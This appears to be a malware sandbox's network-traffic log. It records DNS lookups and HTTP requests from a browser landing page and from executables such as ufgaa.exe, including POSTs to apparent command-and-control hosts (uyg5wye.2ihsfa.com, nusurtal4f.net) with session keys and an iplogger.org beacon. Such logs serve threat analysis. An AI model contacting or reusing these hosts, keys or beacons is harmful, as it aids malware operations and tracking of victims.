                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=9%2BpIlGUTBV8VsKTn4iK3gNT5jdhFc4zo%2BwCk2jgQR2%2F%2Bh2fYfSeF22xVRla6pU9Oz2I%2B3VbrLynKTdLUBifbzBmEyNTlmf%2B2jzwBOLcDRqBYP5Nj0LTQMelN9o3A"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d875dd30125-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/mid.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/mid.png HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          content-type: image/png
                                                                                          content-length: 989
                                                                                          last-modified: Thu, 08 Jul 2021 11:54:40 GMT
                                                                                          etag: "60e6e780-3dd"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 5754
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=BEw8NMMcOiVxNrWNZo8ZcjfAxIUCHitOSLcAqeogu92zeZEeD2BEorIrUqUUOzm8nmG48D%2Fck8cFaAzASHHRtKyWxhU%2Bvh%2FyWOFGaxiJpi2AIg%2FNSQZHleeXATfa"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d878dfd0125-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/bottom.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/bottom.png HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          content-type: image/png
                                                                                          content-length: 2133
                                                                                          last-modified: Thu, 08 Jul 2021 11:54:40 GMT
                                                                                          etag: "60e6e780-855"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 5754
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=mwDltItUYNWAEd4lm8GM4pdMH9ftMNkp3ErxblVD2zXveY484PymgsYmei%2BMYeXJwYp4tmEZ208O8bnGjqs7hWKTvJMoyD2ygWvDg4MdxQwvINzvkQObk6CJun7x"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d878e020125-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/assist/lp-download-ie.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/assist/lp-download-ie.png HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          content-type: image/png
                                                                                          content-length: 72792
                                                                                          last-modified: Thu, 24 Jun 2021 20:01:09 GMT
                                                                                          etag: "60d4e485-11c58"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 4295
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=N5iHxzHZVHXy8B76yYtpkMw54xDjbi7nux7wCfliKTu8xJbAhR92OrhVRShBxLiTEvvYTJRAAl7MsonJudZIz2pVVRx5qawmOyhrl9t0trWbKw59Amd7pjxLh6rE"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d87ae260125-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          cdnjs.cloudflare.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          Response
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          104.16.18.94
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          104.16.19.94
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          cdnjs.cloudflare.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          Response
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          104.16.18.94
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          104.16.19.94
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.10.2/jquery-ui.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.16.18.94:443
                                                                                          Request
                                                                                          GET /ajax/libs/jqueryui/1.10.2/jquery-ui.min.js HTTP/2.0
                                                                                          host: cdnjs.cloudflare.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: application/javascript; charset=utf-8
                                                                                          content-length: 51522
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: public, max-age=30672000
                                                                                          content-encoding: br
                                                                                          etag: "5eb03ec4-37ade"
                                                                                          last-modified: Mon, 04 May 2020 16:11:48 GMT
                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                          cross-origin-resource-policy: cross-origin
                                                                                          timing-allow-origin: *
                                                                                          x-content-type-options: nosniff
                                                                                          cf-request-id: 0abd8b2b7600002e448a22f000000001
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          vary: Accept-Encoding
                                                                                          cf-cache-status: HIT
                                                                                          age: 1905892
                                                                                          expires: Wed, 29 Jun 2022 23:12:59 GMT
                                                                                          accept-ranges: bytes
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=CIKEOeh%2FRZB4AobP0b6wFbtjyFFZ%2F%2F0OjdPpOIsVp5fSlS%2FnxqYQMMUOmIcMHBNeO%2F1uqfOAvfA35%2BRtGID50tRewM%2Bi%2Fc%2Bv1DPok46A%2F4ixOGwy7FSViGe9mE%2Fk2MU%2Fyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          strict-transport-security: max-age=15780000
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d85ec192e3e-BRU
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://cdnjs.cloudflare.com/ajax/libs/jquery/1.11.1/jquery.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.16.18.94:443
                                                                                          Request
                                                                                          GET /ajax/libs/jquery/1.11.1/jquery.min.js HTTP/2.0
                                                                                          host: cdnjs.cloudflare.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: application/javascript; charset=utf-8
                                                                                          content-length: 29910
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: public, max-age=30672000
                                                                                          content-encoding: br
                                                                                          etag: "5eb03ec4-1762a"
                                                                                          last-modified: Mon, 04 May 2020 16:11:48 GMT
                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                          cross-origin-resource-policy: cross-origin
                                                                                          timing-allow-origin: *
                                                                                          x-content-type-options: nosniff
                                                                                          cf-request-id: 0a7515e36b0000f9619281a000000001
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          vary: Accept-Encoding
                                                                                          cf-cache-status: HIT
                                                                                          age: 3121538
                                                                                          expires: Wed, 29 Jun 2022 23:12:59 GMT
                                                                                          accept-ranges: bytes
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=9J3riQ5kN%2B1ejnogdn10sqonUR%2FgrgYaPfK9Pe%2BAARoKt0v3%2FyxfU9SZoU5pwGKR4U9%2B8OaXhQlp0LVFC9nNLtWJBFLj%2FdO91NXkh2kRC8uA5zq%2BGzBQX6Nt1oQDuOFdOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          strict-transport-security: max-age=15780000
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d85ec1b2e3e-BRU
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          track.xdisctracking.pw
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          track.xdisctracking.pw
                                                                                          IN A
                                                                                          Response
                                                                                          track.xdisctracking.pw
                                                                                          IN CNAME
                                                                                          toutory-loormself.com
                                                                                          toutory-loormself.com
                                                                                          IN A
                                                                                          34.230.220.28
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          track.xdisctracking.pw
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          track.xdisctracking.pw
                                                                                          IN A
                                                                                          Response
                                                                                          track.xdisctracking.pw
                                                                                          IN CNAME
                                                                                          toutory-loormself.com
                                                                                          toutory-loormself.com
                                                                                          IN A
                                                                                          34.230.220.28
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://track.xdisctracking.pw/impression/0c4a809a-fe91-45d9-9cbb-56283b83c79a?SubID=null&ClickID=186205267&KW202=PA_POP_1851483
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          34.230.220.28:443
                                                                                          Request
                                                                                          GET /impression/0c4a809a-fe91-45d9-9cbb-56283b83c79a?SubID=null&ClickID=186205267&KW202=PA_POP_1851483 HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: track.xdisctracking.pw
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 204
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-store, no-cache, pre-check=0, post-check=0
                                                                                          Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                          Pragma: no-cache
                                                                                          Set-Cookie: 0c4a809a-fe91-45d9-9cbb-56283b83c79a-osz-v4=0Z32fhTVKUehRin3HN5I3GSe6sFy_jLQ7VNUN6dhoQoPolQvxGGBb_78puCe7XFeeeOnM2Nq6zgGntPOO2Vw96dL4yMRVpiBzGPfV7WxL2tv_E1B7TAHhZ21y6yn0-B25u-LgEG2OnJQJAqqr4T3LZzIWxkubzZaV16Tqw_QcmhvUPvtoYdKQomqLg3v7Qlb_r8GY1B35gE1iVdKDftSe-N5_f3iaTw4MQoRh8Q67Y-zUJ3P-apu2eEbZ3Vf4RiEUoT79l4W5XMcyZLiqTWcnl8HBC_0qc7Ymr2V45-jNyVPQxjeB_VBZQRefCeXFgUM0NFwqowX_oex284zlO6qr6KZTi3kdeiNyPM2qH3v3aO2tEfzNI4mRmgIVxJKNp1SG-uD2J7_7BYGx6OPyHBC3qARSTIjSuSs4gYFm0uuBcE; Domain=track.xdisctracking.pw; Path=/; Secure; HttpOnly;SameSite=None
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/favicon.ico HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          dnt: 1
                                                                                          Response
                                                                                          HTTP/2.0 404
                                                                                          date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          content-type: text/html
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 33
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=icADIkn%2BZjecILL86f%2BIMdjGIFWdYjqfuIdNTew8xsmTML3oiGANyQPW%2FfvwymkYc9t8iCfSQMp%2FvIPr%2BLfMeh0598aOsxnzgj2zPo2KSMVbsjwQrJqnvj62oCF5"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d89cb11fa8c-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          dnt: 1
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          content-type: image/x-icon
                                                                                          last-modified: Mon, 08 Feb 2021 17:24:50 GMT
                                                                                          etag: W/"602173e2-3c2e"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 58
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=yyqmGkb0gHoGpqlS%2Bjx95KUKjsEqTnYZDm6mlIxj5oW74MUBRwohgiUyVMApVLohapGdIgioSe08hJgJWLH%2FpTfoWvhUnN3%2FKCkCzDc9nnyf9CW64ZcKWX1t%2BhWY"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d8a0b4dfa8c-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          nusurtal4f.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          nusurtal4f.net
                                                                                          IN A
                                                                                          Response
                                                                                          nusurtal4f.net
                                                                                          IN A
                                                                                          5.61.43.76
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 227
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:13:43 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 7
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.facebook.com
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.facebook.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.facebook.com
                                                                                          IN CNAME
                                                                                          star-mini.c10r.facebook.com
                                                                                          star-mini.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.36
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.facebook.com/
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          31.13.83.36:443
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Sec-Fetch-Dest: document
                                                                                          Sec-Fetch-Mode: navigate
                                                                                          Sec-Fetch-Site: none
                                                                                          Sec-Fetch-User: ?1
                                                                                          Upgrade-Insecure-Requests: 1
                                                                                          Host: www.facebook.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Vary: Accept-Encoding
                                                                                          x-fb-rlafr: 0
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 0
                                                                                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                                                                                          X-Frame-Options: DENY
                                                                                          Strict-Transport-Security: max-age=15552000; preload
                                                                                          Content-Type: text/html; charset="utf-8"
                                                                                          X-FB-Debug: nv6LdKbwR+evYeCInmSQzMoI9JBHL3LgHA+KixBaOw/tRdi9LVnPFxvQg716v/OQSKE6A3QNOZPLSdfxv5sXJg==
                                                                                          Date: Fri, 09 Jul 2021 23:15:06 GMT
                                                                                          Priority: u=3,i
                                                                                          Transfer-Encoding: chunked
                                                                                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                                                                                          Connection: keep-alive
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          88.218.92.148:80
                                                                                          Request
                                                                                          GET /api/fbtime HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          Host: uyg5wye.2ihsfa.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:15:07 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.3.21
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://uyg5wye.2ihsfa.com/api/?sid=72869&key=d871ff8abd9a60f9f0fd16913295de1e
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          88.218.92.148:80
                                                                                          Request
                                                                                          POST /api/?sid=72869&key=d871ff8abd9a60f9f0fd16913295de1e HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          Content-Length: 266
                                                                                          Host: uyg5wye.2ihsfa.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:15:08 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.3.21
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://iplogger.org/18hh57
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          88.99.66.31:443
                                                                                          Request
                                                                                          GET /18hh57 HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Host: iplogger.org
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:15:08 GMT
                                                                                          Content-Type: image/png
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Set-Cookie: PHPSESSID=emeltpd839ebulgtvjonlo9au7; path=/; HttpOnly
                                                                                          Pragma: no-cache
                                                                                          Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253175683; path=/
